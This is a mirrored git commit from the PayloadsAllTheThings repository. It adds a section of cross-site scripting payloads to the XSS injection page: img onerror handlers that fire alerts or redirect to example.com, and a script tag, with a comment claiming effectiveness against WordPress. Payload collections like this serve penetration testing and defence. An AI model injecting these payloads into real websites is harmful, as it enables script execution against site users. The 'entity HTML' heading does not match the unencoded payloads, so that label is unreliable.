mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-05-07 12:07:37 +02:00
Add entity HTML payload in XSS injection
This commit is contained in:
parent
f695b0a527
commit
4604f7bcfb
1 changed files with 10 additions and 0 deletions
|
|
@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
|
|||
<div onpointerout="alert(45)">MOVE HERE</div>
|
||||
<div onpointerup="alert(45)">MOVE HERE</div>
|
||||
```
|
||||
### XSS using entity HTML
|
||||
|
||||
```javascript
|
||||
// Works very good at Wordpress (CVE-2025-14588)
|
||||
|
||||
<img src=x onerror=alert(1)>
|
||||
<img src=x onerror=window.location.href="https://example.com">
|
||||
<img src=1 onerror="alert(1)">
|
||||
<script>alert(1)</script>
|
||||
```
|
||||
|
||||
### XSS using HTML5 tags
|
||||
|
||||
|
|
|
|||
Loading…
Reference in a new issue